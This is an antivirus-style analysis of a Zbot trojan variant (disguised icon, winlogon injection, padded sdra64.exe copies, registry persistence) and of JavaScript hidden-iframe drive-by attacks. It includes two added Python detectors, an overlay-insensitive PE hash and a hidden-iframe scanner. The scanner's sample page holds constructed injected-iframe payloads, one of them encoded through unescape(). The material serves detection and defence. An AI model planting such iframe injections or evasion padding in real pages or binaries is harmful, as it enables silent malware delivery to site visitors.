The malware comes with a common trick aimed at users: it carries a different icon than the usual executable icon. In this case it is a *.chm file icon (Microsoft Compiled HTML Help File). We have also seen Zbot use Microsoft Excel and standard directory icons.
As for most Zbots, its infection vector is email spam.
This particular version of Zbot is actually nothing else but a repacked version of Trojan.Spy.ZBot.UI. It injects code into winlogon.exe, allowing it to create files and connect to the Internet undetected. Making use of this, it creates a copy of itself as %windir%\system32\sdra64.exe, adding garbage to the executable so that it has a different size and MD5 hash, a rather shy attempt at AV evasion. It also creates a folder called lowsec in the same directory, in which it writes three files containing encrypted data: local.ds, user.ds and user.ds.lll.
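The padding trick above defeats a plain file hash but not a hash that stops where the PE image ends. The following added example (not part of the original article, and not BitDefender's code) builds a constructed, non-loadable minimal PE layout, appends garbage the way the text describes, and shows that the whole-file MD5 changes while an MD5 computed only up to the end of the last section (ignoring the overlay) stays identical. It assumes the garbage is appended after the last section; a variant that inserts bytes inside the image would need a different normalisation.

```python
import hashlib
import struct

COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40


def build_fake_pe(section_data: bytes) -> bytes:
    """Constructed minimal PE layout for the demo (not a loadable binary):
    DOS header, PE signature, COFF header, a dummy optional header and one
    section header, with the section's raw data at file offset 0x200."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    size_of_optional_header = 16
    coff = struct.pack("<HHIIIHH",
                       0x14C,                    # Machine: i386
                       1,                        # NumberOfSections
                       0, 0, 0,                  # TimeDateStamp, symbol table fields
                       size_of_optional_header,
                       0x0102)                   # Characteristics: executable, 32-bit
    optional = b"\x00" * size_of_optional_header
    raw_ptr = 0x200
    section = struct.pack("<8sIIIIIIHHI",
                          b".text", len(section_data), 0x1000,
                          len(section_data), raw_ptr,   # SizeOfRawData, PointerToRawData
                          0, 0, 0, 0, 0x60000020)
    headers = dos_header + b"PE\0\0" + coff + optional + section
    assert len(headers) <= raw_ptr
    return headers.ljust(raw_ptr, b"\x00") + section_data


def image_end(pe: bytes) -> int:
    """File offset just past the last section's raw data. Anything after it
    is overlay, which is exactly where appended garbage ends up."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", pe, coff + 2)[0]        # NumberOfSections
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]         # SizeOfOptionalHeader
    first_section = coff + COFF_HEADER_SIZE + size_opt
    end = first_section + n_sections * SECTION_HEADER_SIZE        # never cut the headers
    for i in range(n_sections):
        off = first_section + i * SECTION_HEADER_SIZE
        size_raw, ptr_raw = struct.unpack_from("<II", pe, off + 16)
        end = max(end, ptr_raw + size_raw)
    return min(end, len(pe))


def overlay_size(pe: bytes) -> int:
    return len(pe) - image_end(pe)


def full_md5(pe: bytes) -> str:
    """The naive hash the padding trick is designed to change."""
    return hashlib.md5(pe).hexdigest()


def overlay_insensitive_md5(pe: bytes) -> str:
    """MD5 over the PE image only, so appended garbage does not affect it."""
    return hashlib.md5(pe[:image_end(pe)]).hexdigest()


# Constructed sample: a tiny fake .text section, then the same file with garbage appended.
ORIGINAL = build_fake_pe(b"\x55\x89\xe5" + b"\x90" * 61)
GARBAGE = b"\xa5" * 4096
PADDED = ORIGINAL + GARBAGE

if __name__ == "__main__":
    for name, sample in (("original", ORIGINAL), ("padded", PADDED)):
        print(f"{name}: size={len(sample)} overlay={overlay_size(sample)} "
              f"md5={full_md5(sample)} image_md5={overlay_insensitive_md5(sample)}")
```

The whole-file hashes differ and the file sizes differ, just as the article describes, but the image-only hashes match, so a single indicator covers both the pristine sample and every garbage-padded copy dropped as sdra64.exe.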
In order to run at every system startup, the Trojan makes changes to certain registry entries. It also marks its presence on the computer by creating the following mutex: __SYSTEM__64AD0625__
This generic detection by BitDefender stands for JavaScripts which try to exploit vulnerabilities in outdated browsers or in third-party browser plugins such as ActiveX controls for PDF viewing, Flash playback and others.
The idea of the script is to load malicious pages either from sites crafted specifically for this purpose, or from initially clean websites which were later compromised and modified to act as a medium.
The mechanics behind the attack are to inject JavaScript code into the clean page, which results in the creation of a special iframe, invisible to the eye, that loads another page behind the page the victim is visiting at the moment.
That other page will most likely contain several exploits for the above-mentioned plugins, and whichever succeeds will download malware onto the affected PC without the user's notice or consent. This type of download is called a drive-by download, and the payload depends on the page that the injected JavaScript loads into the clean site.
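The hidden-iframe injection described above leaves a recognisable trace in the compromised page's markup. The following added example (not part of the original article, and not BitDefender's detection logic) scans an HTML document for iframes that are invisible to the eye: zero or one pixel in size, hidden by CSS, or positioned off-screen. It also looks inside script blocks, because injected loaders typically document.write() the iframe, often through unescape(), so that it never appears in the static markup. The sample page, the hostnames under .invalid and the attribute heuristics are constructed for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Inline CSS that makes an element invisible (whitespace is stripped before matching).
HIDDEN_STYLE = re.compile(r"display:none|visibility:hidden|(?:left|top):-\d+")
# An iframe tag written out from JavaScript, after percent-decoding.
SCRIPT_IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name="value", name='value' or name=value inside a tag string.
ATTR = re.compile(r'([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def _pixels(value):
    """Numeric part of a width/height attribute ("1", "1px", "0%"), or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class HiddenIframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def _check_iframe(self, attrs, origin):
        reasons = []
        for dim in ("width", "height"):
            n = _pixels(attrs.get(dim))
            if n is not None and n <= 1:
                reasons.append(f"{dim}={n}")
        style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
        for rule in HIDDEN_STYLE.findall(style):
            reasons.append(f"style:{rule}")
        if reasons:
            self.findings.append({"src": attrs.get("src", ""),
                                  "origin": origin, "reasons": reasons})

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            self._check_iframe({k: (v or "") for k, v in attrs}, "static")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            return
        # Decode the unescape('%3Ciframe...') form, then pull out any iframe tags.
        for tag_text in SCRIPT_IFRAME.findall(unquote(data)):
            attrs = {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
                     for m in ATTR.finditer(tag_text)}
            self._check_iframe(attrs, "script")


def find_hidden_iframes(html: str):
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a legitimate embed, one statically injected hidden iframe,
# and one written from an injected script through unescape().
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example/embed/42" width="640" height="360"></iframe>
<iframe src="http://attacker.invalid/in.php" width=1 height=1 style="visibility: hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://other.invalid/load.php%22 width=0 height=0 style=%22display:none%22%3E%3C/iframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE_PAGE):
        print(f"[{f['origin']}] {f['src']}  ({', '.join(f['reasons'])})")
```

The visible 640x360 embed is left alone, while both injected frames are reported with the reason they were judged invisible. Real injections add further obfuscation layers (String.fromCharCode, split strings, packed code), so this scanner is a first-pass triage aid rather than a complete detector; the text after a script tag in a dumped page is the place to look when the static markup shows nothing.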
Information in this article is available courtesy of BitDefender virus researchers Lutas Andrei Vlad and Marius Vanta.
November 14, 2024
September 06, 2024